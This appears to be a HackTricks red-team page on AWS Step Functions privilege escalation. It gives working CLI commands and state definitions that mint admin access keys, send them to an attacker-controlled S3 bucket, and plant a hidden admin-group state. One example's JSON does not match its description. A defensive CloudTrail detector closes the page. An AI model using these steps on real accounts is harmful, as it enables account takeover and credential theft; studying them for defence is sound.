AWS - Step Functions Privesc
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Step Functions
For more information about this AWS service, check:
Task Resources
These privilege escalation techniques require using some AWS Step Functions resources to perform the actions involved in the privilege escalation.
To check all the possible actions, you can go to your AWS account, select the action you want to use and look at the parameters it takes, as follows:

Or you can also go to the AWS API documentation and check the documentation of each action:
states:TestState & iam:PassRole
An attacker with the states:TestState and iam:PassRole permissions could test any state and pass any IAM role to it without creating or updating an existing state machine, which could allow them to gain unauthorized access to other AWS services using the permissions of that role. Combined, these permissions could lead to many unauthorized actions, from manipulating workflows or data, data exfiltration and resource destruction, up to privilege escalation.
aws states test-state --definition <value> --role-arn <value> [--input <value>] [--inspection-level <value>] [--reveal-secrets | --no-reveal-secrets]
The following examples show how to test a state that creates an access key for the admin user, using these permissions and a permissive role in the AWS environment. This permissive role should have some highly privileged policy attached (for example arn:aws:iam::aws:policy/AdministratorAccess) that allows the state to perform the iam:CreateAccessKey action:
- stateDefinition.json:
{
  "Type": "Task",
  "Parameters": {
    "UserName": "admin"
  },
  "Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
  "End": true
}
- Command executed to perform the privesc:
aws stepfunctions test-state --definition file://stateDefinition.json --role-arn arn:aws:iam::<account-id>:role/PermissiveRole
{
"output": "{
\"AccessKey\":{
\"AccessKeyId\":\"AKIA1A2B3C4D5E6F7G8H\",
\"CreateDate\":\"2024-07-09T16:59:11Z\",
\"SecretAccessKey\":\"1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j\",
\"Status\":\"Active\",
\"UserName\":\"admin\"
}
}",
"status": "SUCCEEDED"
}
Potential Impact: Unauthorized execution and manipulation of workflows and access to sensitive resources, which could lead to a large-scale security breach.
states:CreateStateMachine & iam:PassRole & (states:StartExecution | states:StartSyncExecution)
An attacker with states:CreateStateMachine & iam:PassRole could create a state machine and provide it with any IAM role, allowing unauthorized access to other AWS services with the permissions of that role. Unlike the previous privesc technique (states:TestState & iam:PassRole), this one does not execute by itself; you will also need the states:StartExecution or states:StartSyncExecution permission (states:StartSyncExecution is not available for standard workflows, only for express state machines) to start an execution of the state machine.
# Create a state machine
aws states create-state-machine --name <value> --definition <value> --role-arn <value> [--type <STANDARD | EXPRESS>] [--logging-configuration <value>]\
[--tracing-configuration <enabled=true|false>] [--publish | --no-publish] [--version-description <value>]
# Start a state machine execution
aws states start-execution --state-machine-arn <value> [--name <value>] [--input <value>] [--trace-header <value>]
# Start a Synchronous Express state machine execution
aws states start-sync-execution --state-machine-arn <value> [--name <value>] [--input <value>] [--trace-header <value>]
The following examples show how to create a state machine that creates an access key for the admin user and uploads that access key to an attacker-controlled S3 bucket, using these permissions and a highly privileged role in the AWS environment. This role should have some highly privileged policy attached (for example arn:aws:iam::aws:policy/AdministratorAccess) that allows the state machine to perform the iam:CreateAccessKey and s3:PutObject actions.
- stateMachineDefinition.json:
{
  "Comment": "Malicious state machine to create IAM access key and upload to S3",
  "StartAt": "CreateAccessKey",
  "States": {
    "CreateAccessKey": {
      "Type": "Task",
      "Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
      "Parameters": {
        "UserName": "admin"
      },
      "ResultPath": "$.AccessKeyResult",
      "Next": "PrepareS3PutObject"
    },
    "PrepareS3PutObject": {
      "Type": "Pass",
      "Parameters": {
        "Body.$": "$.AccessKeyResult.AccessKey",
        "Bucket": "attacker-controlled-S3-bucket",
        "Key": "AccessKey.json"
      },
      "ResultPath": "$.S3PutObjectParams",
      "Next": "PutObject"
    },
    "PutObject": {
      "Type": "Task",
      "Resource": "arn:aws:states:::aws-sdk:s3:putObject",
      "Parameters": {
        "Body.$": "$.S3PutObjectParams.Body",
        "Bucket.$": "$.S3PutObjectParams.Bucket",
        "Key.$": "$.S3PutObjectParams.Key"
      },
      "End": true
    }
  }
}
- Command executed to create the state machine:
aws stepfunctions create-state-machine --name MaliciousStateMachine --definition file://stateMachineDefinition.json --role-arn arn:aws:iam::123456789012:role/PermissiveRole
{
"stateMachineArn": "arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine",
"creationDate": "2024-07-09T20:29:35.381000+02:00"
}
- Command executed to start an execution of the previously created state machine:
aws stepfunctions start-execution --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine
{
"executionArn": "arn:aws:states:us-east-1:123456789012:execution:MaliciousStateMachine:1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
"startDate": "2024-07-09T20:33:35.466000+02:00"
}
warning
The attacker-controlled S3 bucket must be configured to accept the s3:PutObject action from the victim account.
Potential Impact: Unauthorized execution and manipulation of workflows and access to sensitive resources, which could lead to a major security breach.
states:UpdateStateMachine & (not always required) iam:PassRole
An attacker with the states:UpdateStateMachine permission could modify the definition of a state machine, including adding extra hidden states that could lead to privilege escalation. That way, when a legitimate user starts an execution of the state machine, the new hidden malicious state will be executed and the privilege escalation will succeed.
Depending on the permission level of the IAM Role associated with the state machine, the attacker will face one of two scenarios:
- Permissive IAM Role: If the IAM Role associated with the state machine is already permissive (for example, it has the arn:aws:iam::aws:policy/AdministratorAccess policy attached), then the iam:PassRole permission will not be needed to escalate privileges, because it will not be necessary to update the IAM Role as well; updating the state machine definition will be enough.
- Not permissive IAM Role: Unlike the previous case, here the attacker will also need the iam:PassRole permission, because it will be necessary to associate a more privileged IAM Role with the state machine in addition to modifying the state machine definition.
aws states update-state-machine --state-machine-arn <value> [--definition <value>] [--role-arn <value>] [--logging-configuration <value>] \
[--tracing-configuration <enabled=true|false>] [--publish | --no-publish] [--version-description <value>]
The following examples show how to update a legitimate state machine that only invokes the HelloWorld Lambda function, in order to add an extra state that adds the user unprivilegedUser to the administrator IAM Group. This way, when a legitimate user starts an execution of the updated state machine, this new hidden malicious state will be executed and the privilege escalation will succeed.
warning
If the state machine does not have a permissive IAM Role associated with it, the iam:PassRole permission will also be required to update the IAM Role, in order to associate a permissive IAM Role (for example one with the arn:aws:iam::aws:policy/AdministratorAccess policy attached).
{
  "Comment": "Hello world from Lambda state machine",
  "StartAt": "Start PassState",
  "States": {
    "Start PassState": {
      "Type": "Pass",
      "Next": "LambdaInvoke"
    },
    "LambdaInvoke": {
      "Type": "Task",
      "Resource": "arn:aws:states:::lambda:invoke",
      "Parameters": {
        "FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"
      },
      "Next": "End PassState"
    },
    "End PassState": {
      "Type": "Pass",
      "End": true
    }
  }
}
- Command executed to update the legitimate state machine:
aws stepfunctions update-state-machine --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:HelloWorldLambda --definition file://StateMachineUpdate.json
{
"updateDate": "2024-07-10T20:07:10.294000+02:00",
"revisionId": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
}
Potential Impact: Unauthorized execution and manipulation/disruption of workflows and access to sensitive resources, which could lead to a major security breach.
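All three techniques on this page rely on a Task state that reaches IAM through the aws-sdk integration, so a defender can hunt for exactly that. The following Python is an added example (not HackTricks' own code): it walks a Step Functions definition, including nested Parallel branches and Map iterators, flags Task states targeting IAM or STS, and applies the check to a constructed CloudTrail-style UpdateStateMachine event. The event field names and the presence of the definition inside requestParameters are assumptions; adapt them to your own log records.

```python
import json

# SDK integrations through which a Task state can alter identities or permissions.
SENSITIVE_PREFIXES = ("arn:aws:states:::aws-sdk:iam:", "arn:aws:states:::aws-sdk:sts:")
WATCHED_EVENTS = {"TestState", "CreateStateMachine", "UpdateStateMachine"}

def iter_states(definition):
    """Yield (name, state) for every state, descending into Parallel branches and Map
    iterators. A bare single state (the shape TestState accepts) is yielded as-is."""
    if "States" not in definition:
        yield "(single state)", definition
        return
    for name, state in definition["States"].items():
        yield name, state
        for branch in state.get("Branches", []):
            yield from iter_states(branch)
        for key in ("Iterator", "ItemProcessor"):
            if key in state:
                yield from iter_states(state[key])

def sensitive_tasks(definition):
    """Names of Task states whose Resource targets IAM or STS."""
    return [name for name, state in iter_states(definition)
            if state.get("Type") == "Task"
            and str(state.get("Resource", "")).startswith(SENSITIVE_PREFIXES)]

def review_event(event):
    """Finding dict for a watched API call whose definition contains IAM/STS tasks,
    else None. roleArn is kept: new role + new definition is the iam:PassRole variant."""
    if event.get("eventName") not in WATCHED_EVENTS:
        return None
    params = event.get("requestParameters") or {}
    raw = params.get("definition")
    if not raw:
        return None
    hits = sensitive_tasks(json.loads(raw) if isinstance(raw, str) else raw)
    if not hits:
        return None
    return {"event": event["eventName"], "sensitive_states": hits,
            "actor": event.get("userIdentity", {}).get("arn"),
            "role_arn": params.get("roleArn")}

# Constructed sample (assumed log shape): an UpdateStateMachine that buries an IAM task
# inside a Parallel branch of an otherwise harmless workflow.
SAMPLE_EVENT = {"eventName": "UpdateStateMachine",
    "userIdentity": {"arn": "arn:aws:iam::123456789012:user/unprivilegedUser"},
    "requestParameters": {"definition": json.dumps({"StartAt": "Work", "States": {"Work": {
        "Type": "Parallel", "End": True, "Branches": [{"StartAt": "Hidden", "States": {"Hidden": {
            "Type": "Task", "End": True, "Resource": "arn:aws:states:::aws-sdk:iam:addUserToGroup",
            "Parameters": {"UserName": "unprivilegedUser", "GroupName": "administrator"}}}}]}}})}}
```

A matching preventive control is to scope iam:PassRole with the iam:PassedToService condition key to states.amazonaws.com and to the specific roles a workflow may assume, so that a hidden state cannot pick up an unrelated privileged role.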